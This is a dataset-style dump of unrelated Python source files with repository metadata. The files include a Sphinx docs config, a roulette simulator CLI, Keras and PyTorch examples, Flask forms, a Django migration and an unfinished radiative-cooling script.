# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../../../../lib/python2.7/site-packages/'))
from django.conf import settings
settings.configure()
autoclass_content = "both"
import os
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
intersphinx_mapping = {
'autocompletelight': ('http://django-autocomplete-light.readthedocs.org/en/latest/', None),
}
else:
intersphinx_mapping = {
'autocompletelight': ('file:///home/jpic/env/src/autocomplete-light/docs/build/html/', None),
}
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-cities-light'
copyright = u'2012, James Pic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.1'
# The full version, including alpha/beta/rc tags.
release = '2.1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-cities-lightdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-cities-light.tex', u'django-cities-light Documentation',
u'James Pic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-cities-light', u'django-cities-light Documentation',
[u'James Pic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-cities-light', u'django-cities-light Documentation',
u'James Pic', 'django-cities-light', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"jamespic@gmail.com"
] | jamespic@gmail.com |
5c72f6af9b24225574fd7870da492dad430f396d | d4d9323ae998fdb08729e6b4ea5860bd8f35edbd | /koroviev/massey_ranking.py | 2e8656ee3f8836b8e5bdb2948d318a648ee57810 | [] | no_license | jaspajjr/koroviev | abb7216602b18ffd0b51cd2ef53d7fe1bfa1a13a | 43de78e5db7c8b4411cc168ea551e691e781b402 | refs/heads/master | 2020-12-25T13:34:27.800852 | 2016-07-17T22:24:01 | 2016-07-17T22:24:01 | 63,483,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | import pandas as pd
import numpy as np
def main():
return 1
| [
"jaspajr@gmail.com"
] | jaspajr@gmail.com |
2c3a637d4f4e3eff8d66367b9ef348f382db4bf5 | 687d41506e151a4c92150d2625ade29cdfffd233 | /pycasino/cli.py | e24a7eb85f3e08f288bbc59bff69d5d66c116ebf | [
"MIT"
] | permissive | pblankenau2/pycasino | 3022dafcc47be7e2f365e767239fdd0dd9cdc807 | ca0fc95dae9a15789262ca3b3396c853fed3f3ea | refs/heads/master | 2020-03-20T18:53:02.957380 | 2020-03-01T00:37:45 | 2020-03-01T00:37:45 | 137,609,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,555 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import click
import yaml
import click_config_file
from .roulette import model
from .roulette import player
from .roulette import wheel_builder
def player_factory(player_name, **kwargs):
"""
kwargs will contain all the params necessary to initialize the player
"""
return player.REGISTERED_PLAYERS[player_name](**kwargs)
def read_config(filepath, cmd_name):
with open(filepath) as config_data:
return yaml.safe_load(config_data)[cmd_name]
@click.group()
def main():
"""Collects statistics about the outcomes of using particular betting
strategies in different games. This is not a simulation where you play
the game yourself. Instead, you select your game, a player that
will play with a certain betting strategy and the number of game sessions
that player should play. A players session is limited by his/her stake
and a maximum number of rounds to play. These can be modified in a
configuration file.
"""
pass
@main.command()
@click.option(
"--num-games",
"-n",
default=50,
show_default=True,
help="The number of games to play.",
)
@click.option(
"--stake", "-s", default=100.0, show_default=True, help="The players initial funds."
)
@click.option(
"--max-rounds",
default=20,
show_default=True,
help="The maximum # of rounds per game.",
)
@click.option(
"--base-bet-amount",
default=20.0,
show_default=True,
help="The initial bet amount (strategies modify following bets amounts).",
)
@click.option(
"--table-limit",
default=350.0,
show_default=True,
help="The maximum amount a bet can be.",
)
@click_config_file.configuration_option(provider=read_config, implicit=False)
@click.argument(
"player",
type=click.Choice(player.REGISTERED_PLAYERS.keys(), case_sensitive=False),
nargs=1,
)
def roulette(player, stake, base_bet_amount, max_rounds, table_limit, num_games):
player_args = {
"stake": stake,
"base_bet_amount": base_bet_amount,
"rounds": max_rounds,
}
game = model.Game(
table=model.Table(table_limit), wheel=wheel_builder.create_wheel()
)
sim = model.Simulator(
game=game, player=player_factory(player_name=player, **player_args)
)
sim.gather(num_games)
click.echo("maximum_stake, rounds_played")
for i in zip(sim.maxima, sim.durations):
click.echo(f"{i[0]}, {i[1]}")
return 0
if __name__ == "__main__":
sys.exit(main())
| [
"pblankenau@msn.com"
] | pblankenau@msn.com |
1cb30c9e269871d07348485c6437fce3c01a5415 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py | dd93d22d4040925980e877b62a2e0b299673c4bd | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
| [
"github@cuba12345"
] | github@cuba12345 |
74a704f681b93a13fcefd0e75f7e187f41461e42 | 89fd759f9dd96367979f8ee68e0f1ae295de2420 | /gui/matplotlib_canvas.py | ef57010d5e978ce9f93e13adac12413e2171cd0b | [] | no_license | lars-frogner/Vortek-C | a92390a90b1d533db7e274404c575606cc889244 | 44c405ca6be0b02c1d5bd734944e225e5f8125dc | refs/heads/master | 2022-09-26T03:59:06.808248 | 2022-08-09T22:41:18 | 2022-08-09T22:41:18 | 170,867,708 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | import matplotlib
matplotlib.use('Qt5Agg')
from PySide2 import QtCore, QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
class MatplotlibCanvas(FigureCanvas):
def __init__(self, parent=None, width=6, height=4, dpi=100, edgecolor='k', linewidth=1.0, tight_layout=True):
self.fig = Figure(figsize=(width, height), dpi=dpi, edgecolor=edgecolor, linewidth=linewidth, tight_layout=tight_layout)
self.axes = self.fig.add_subplot(111)
FigureCanvas.__init__(self, self.fig)
self.setParent(parent)
FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
| [
"lars_frogner@hotmail.com"
] | lars_frogner@hotmail.com |
fbdf9d45ae1f1d3857f5d20f6637a2b22390646e | 115ccf6174c97707558b3a23cc5915f0975e2168 | /predict_classes.py | ec1209cc1463548d72dc5c5b609a0e1b389bdf42 | [
"MIT"
] | permissive | nanohop/keras_neural_network | c78ff89ec1c7794968cd14f0509279b92654d48c | b0eed70c1c8d0f09eb03b72a3ed2acf8ba7465a1 | refs/heads/master | 2020-03-22T22:26:24.247623 | 2018-07-31T19:22:18 | 2018-07-31T19:22:18 | 140,751,856 | 9 | 7 | MIT | 2018-07-15T19:09:59 | 2018-07-12T18:41:44 | Python | UTF-8 | Python | false | false | 820 | py | import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
model = Sequential()
model.add(Dense(8, activation='relu', input_dim=4))
model.add(Dense(16, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(
optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy']
)
data = np.genfromtxt('high_low.csv', delimiter=',')
x_train = data[1:, :4]
y_train = data[1:, 4]
model.fit(
x_train,
y_train,
epochs=100,
validation_split=0.2
)
x_predict = np.array([
[10, 25, 14, 9],
[102, 100, 75, 90]
])
output = model.predict_classes(x_predict)
print("")
print(output)
| [
"chrisachard@gmail.com"
] | chrisachard@gmail.com |
a685b2dfb0378748b35a2cf67a13bd6213a93ce7 | 87646b1128f7cd914cc2dd0e3374c30f74047b09 | /untitled0.py | 0859727b2a0c39a132cac10c09b5a3e38ac45796 | [
"MIT"
] | permissive | parkerwray/tmm | 9c9935dc490f3b580ec477680379d5d236766380 | 8c27a56163d33de5955611eee35864c4485d1b2b | refs/heads/master | 2020-05-07T10:55:13.288850 | 2019-12-24T23:59:19 | 2019-12-24T23:59:19 | 180,438,812 | 0 | 0 | MIT | 2019-04-09T19:49:29 | 2019-04-09T19:49:28 | null | UTF-8 | Python | false | false | 4,526 | py |
from __future__ import division, print_function, absolute_import
#from tmm.tmm_core import (coh_tmm, unpolarized_RT, ellips,
# position_resolved, find_in_structure_with_inf)
from wptherml.wptherml.datalib import datalib
import tmm.tmm_core as tmm
import numpy as np
from numpy import linspace, inf, pi, stack, array, real, imag
import matplotlib.pyplot as plt
import matplotlib as mplib
from scipy.interpolate import interp1d, InterpolatedUnivariateSpline
import scipy.io as sio
#%%
# GET EFFECTIVE INDEX DATA FROM BRUGGEMAN APPROXIMATION
# GET DATA FOR SIO2 AND SIN OVER DENSE WAVELENGTH RANGE
nm = 1e-9
lda = linspace(200,30000,10000) # list of wavelengths in nm
ff = np.array([0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100])/100;
m_sio2 = np.zeros((len(lda),len(ff)+1), dtype = np.complex64);
for idx in range(0,len(ff)):
m_sio2[:,idx] = datalib.alloy(lda*nm, ff[idx], 'Air','SiO2','Bruggeman')
m_sio2[:,-1] = lda
m_sin = np.zeros((len(lda),len(ff)+1), dtype = np.complex64);
for idx in range(0,len(ff)):
m_sin[:,idx] = datalib.alloy(lda*nm, ff[idx], 'Air','SiN','Bruggeman')
m_sin[:,-1] = lda
sio.savemat('SiO2_Brugg_FF_0_5_100_lda.mat', {'m_sio2': m_sio2})
sio.savemat('SiN_Brugg_FF_0_5_100_lda.mat', {'m_sin': m_sin})
#%%
structure_sio2_sin = {
### computation mode - inline means the structure and calculation
### type will be determined from the values of this dictionary
'mode': 'Inline',
### temperature of the structure - relevant for all thermal applications
### value is stored in attribute self.T
'Temperature': 300,
### actual materials the structure is made from
### values are stored in the attribute self.n
#'Material_List': ['Air','SiO2', 'SiO2','Si3N4','Ag', 'Air'],
'Material_List': ['Air', 'SiO2', 'Si3N4', 'Ag', 'Air'],
### thickness of each layer... terminal layers must be set to zero
### values are stored in attribute self.d
'Thickness_List': [0, 100, 100, 1000, 0], # You can not have the back reflector as the last layer!!!
### range of wavelengths optical properties will be calculated for
### values are stored in the array self.lam
'Lambda_List': [250*nm, 30*um, 10000],
## Calculate for explicit angular dependence
'EXPLICIT_ANGLE': 1,
## Calculate quantities related to radiative cooling
'COOLING': 1
}
structure_sin_sio2 = structure_sio2_sin
structure_sin_sio2['Material_List']=['Air', 'Si3N4', 'SiO2', 'Ag', 'Air']
slab_sio2_sin = multilayer(structure_sio2_sin)
slab_sin_sio2 = multilayer(structure_sin_sio2)
H = np.linspace(100, 5000, num = 50)
T = np.array([300, 290, 280, 270, 260, 250])
FF = np.array([0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100])/100;
P_cool_sio2_sin = np.zeros((len(T),len(H),len(H)))
P_cool_sin_sio2 = np.zeros((len(T),len(H),len(H)))
P_cool_sio2_sin_np = np.zeros((len(T),len(H),len(H),len(FF)))
P_cool_sin_sio2_np = np.zeros((len(T),len(H),len(H),len(FF)))
for idx_T in range(0,len(T)):
for idx_L1 in range(0,len(H)):
for idx_L2 in range(0,len(H)):
for idx_ff in range(0,len(FF)):
#%%
## Change one of the layers to an effective index
#fill_fraction = 0.3
#layer = 1
#np_slab.layer_alloy(layer,fill_fraction,'Air','Si3N4','Bruggeman', plot = False)
##np_slab.layer_alloy(layer,fill_fraction,'Air','Si3N4','MG', plot = False)
#layer = 2
#np_slab.layer_alloy(layer,fill_fraction,'Air','SiO2','Bruggeman', plot = False)
#np_slab.fresnel() # You need to update the fresnel Quantities to reflect the effective index change.
#np_slab.fresnel_ea()
#
#elements = 80
#temp = np.linspace(219,450,elements)
#rad_pow = np.zeros([elements,elements])
#sol_pow = np.zeros([elements,elements])
#at_pow = np.zeros([elements,elements])
#cool_pow = np.zeros([elements,elements])
#
#for idx0 in range(0,elements):
# for idx1 in range(0,elements):
# np_slab.T_ml = temp[idx0]
# np_slab.T_amb = temp[idx1]
#
# #np_slab.thermal_emission()
# np_slab.thermal_emission_ea()
# np_slab.cooling_power()
# BB = datalib.BB(np_slab.lambda_array, np_slab.T_ml)
#
# rad_pow[idx0][idx1] = np_slab.radiative_power_val
# sol_pow[idx0][idx1] = np_slab.solar_power_val
# at_pow[idx0][idx1] = np_slab.atmospheric_power_val
# cool_pow[idx0][idx1] = np_slab.cooling_power_val
| [
"pwray@caltech.edu"
] | pwray@caltech.edu |
b2fb7e9429aba97f24de724038516d82b01d2628 | c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a | /flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py | aafdf685ac68e4d45ca808587c1bf1d9451669dc | [
"MIT"
] | permissive | grengojbo/django-flatpages-plus | 467b2e82d3f2d3c71629ddab5288e1416e5ddeda | 29af987565dd4c87fa3b0751105b5521e2690374 | refs/heads/master | 2020-12-24T20:42:23.064557 | 2014-03-02T17:29:22 | 2014-03-02T17:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,533 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FlatPage.photo'
db.add_column('flatpages_plus_flatpage', 'photo',
self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FlatPage.photo'
db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus'] | [
"oleg.dolya@gmail.com"
] | oleg.dolya@gmail.com |
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39 | 5b5eb61c02a1ee6632036a31108d5c962d474d2e | /00/pytorch.py | bae78442e40b561cf168d0df6d691ad703c08406 | [] | no_license | seven320/deeplearning | 73c76fa5e006a9164ed11fe9538b4975c0bdc161 | 56300e450caf390b4f953a9c882a9b4701ccb971 | refs/heads/master | 2021-04-26T22:27:47.019462 | 2018-11-06T02:09:04 | 2018-11-06T02:09:04 | 124,096,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,648 | py |
# coding: utf-8
# pytorch とは?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# ランダム初期設定行列(randomly initialized matrix)
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
0初期設定の行列
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# 実際の値からの行列
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
| [
"yosyuaomenw@yahoo.co.jp"
] | yosyuaomenw@yahoo.co.jp |
994204c474ce80f07986e8118e7b966b7403e899 | d6f75ab837cfbeabfe621e2326b9e7abed1af90e | /care/migrations/0002_picture_complete_status.py | 7b5fdcef85cb94564f404eea0013c4a2ad935c38 | [] | no_license | staradayev/HomeScreen | bb7da1b601e9d38e6af3367b6cf6cddf6cd98ba4 | 79b48229248ca6b104c27313782fbb20e3aa7f52 | refs/heads/master | 2022-02-26T20:02:53.382588 | 2022-02-15T12:06:35 | 2022-02-15T12:06:35 | 12,647,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('care', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='picture',
name='complete_status',
field=models.BooleanField(default=False),
preserve_default=True,
),
]
| [
"staradayev@waverleysoftware.com"
] | staradayev@waverleysoftware.com |
f0388c81796984757e46834de48ad777d5de93dc | 525f9d4a221ae3125b3b4d13bdb11ccb1b779209 | /app/main/forms.py | 298f8a884b51bb626747620fa3c5c674bc1fefc2 | [] | no_license | KobiCat/BlogPyCoursework | 39c86f0f40086f18ca3441f90f111d2a61d27651 | 6c8428b71dd993d6cd76533809fa452cd1cfe6cb | refs/heads/master | 2023-01-20T09:00:28.955691 | 2020-11-24T11:17:48 | 2020-11-24T11:17:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,721 | py | from flask import request
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Length
from flask_babel import _, lazy_gettext as _l
from app.models import User
class SearchForm(FlaskForm):
q = StringField(_l('Search'), validators=[DataRequired()])
def __init__(self, *args, **kwargs):
if 'formdata' not in kwargs:
kwargs['formdata'] = request.args
if 'csrf_enabled' not in kwargs:
kwargs['csrf_enabled'] = False
super(SearchForm, self).__init__(*args, **kwargs)
class EditProfileForm(FlaskForm):
username = StringField(_l('Username'), validators=[DataRequired()])
about_me = TextAreaField(_l('About me'),
validators=[Length(min=0, max=140)])
submit = SubmitField(_l('Submit'))
def __init__(self, original_username, *args, **kwargs):
super(EditProfileForm, self).__init__(*args, **kwargs)
self.original_username = original_username
def validate_username(self, username):
if username.data != self.original_username:
user = User.query.filter_by(username=self.username.data).first()
if user is not None:
raise ValidationError(_('Please use a different username.'))
class EmptyForm(FlaskForm):
submit = SubmitField('Submit')
class PostForm(FlaskForm):
post = TextAreaField(_l('Say something'), validators=[DataRequired()])
submit = SubmitField(_l('Submit'))
class MessageForm(FlaskForm):
message = TextAreaField(_l('Message'), validators=[
DataRequired(), Length(min=0, max=140)])
submit = SubmitField(_l('Submit'))
| [
"keduk2014@gmail.com"
] | keduk2014@gmail.com |
20c1ebe69b8044e89542aaf3c6fccbb22b582a11 | 4a474a98d6cf3a2b778e5572be4920ef5e5aad2e | /Proyecto billetera.py | 0402c941c8deef208629c1009882b29927ae2a5f | [] | no_license | Roger-MG/billetera_criptomonedas | 5d25fd57bc1080008faa694b5d5199298aa60ef0 | 080700ae029e32e87d64a23767055c5614d8394e | refs/heads/main | 2023-06-25T08:12:05.498896 | 2021-07-28T13:56:41 | 2021-07-28T13:56:41 | 390,367,975 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,297 | py | #Proyecto billetera para criptos
import requests
from datetime import datetime #Obtener fecha y hora del sistema
diaConsulta = datetime.now () #Indica la hora actual
global registro
registro = list ()
global codigo_usuario
codigo_usuario = int (input ("¡Bienvenido! Por favor indique su numero de usuario: ")) #Solicita al usuario su código
global balance_moneda
balance_moneda = 0
monedas_list = []
precios_list = []
